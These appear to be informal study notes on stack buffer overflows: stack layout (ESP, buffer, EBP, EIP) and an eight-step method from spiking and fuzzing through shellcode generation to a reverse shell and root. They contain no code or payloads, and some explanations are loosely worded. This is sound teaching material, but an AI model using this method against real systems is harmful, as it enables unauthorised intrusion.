Buffer Overflows

Anatomy of Memory

Kernel (Top) - CLI
Text (Bottom) - Read Only Code

Untitled

Anatomy of The Stack

ESP (Top) | Buffer Space | EBP (Bottom) | EIP/Return Address

What happens is we have buffer space and this buffer space is fills up with characters then the buffer space is going to go downward. What should happen is, if you are probably sanitizing your buffer space, then if send bunch of characters at it. Say, bunch of A's We should reach EBP but then stop. The buffer should be able to contain the character that you are sending.

Now, however if you have buffer overflow attack then you actually overflow the buffer space you are using and reach over the EBP enters into something called EIP.

Now, EIP is where things get interesting. This is pointer address or return address. So, what we can do is, we can use this address to point to direction to direction that we instruct. Now, these directions are going to be malicious code that gives us a reverse shell. We are overflowing buffer space. So, we can write over the buffer space and write down all the way to EIP. You can control the stack. You can control the pointer and eventually you can have a reverse shell which will lead to root.

Untitled

Steps To Conduct a Buffer Overflow

This Process is divided into 8 Steps:

Spiking: Method that we use to find a vulnerable part of a program.
Fuzzing: In Fuzzing we are gonna send bunch of characters at the program & see if we can break it.
Finding the Offset: If we do break it We are gonna find out at what point we did break it. We are gonna find something called as offset.
Overwriting the EIP: We use that offset to Overwrite the EIP Once we have the EIP control. We need to do few inhouse things:
Finding Bad Characters: One is finding bad characters.
Finding the Right Module: The other is finding the right module.
Generating Shellcode: Once we have information from Step 5 & 6, we can generate the malicious shell code that will allow us to get the reverse shell.
Getting Root: We are gonna use the reverse shell and we are gonna point that EIP to our Malicious shell code and gonna get the root.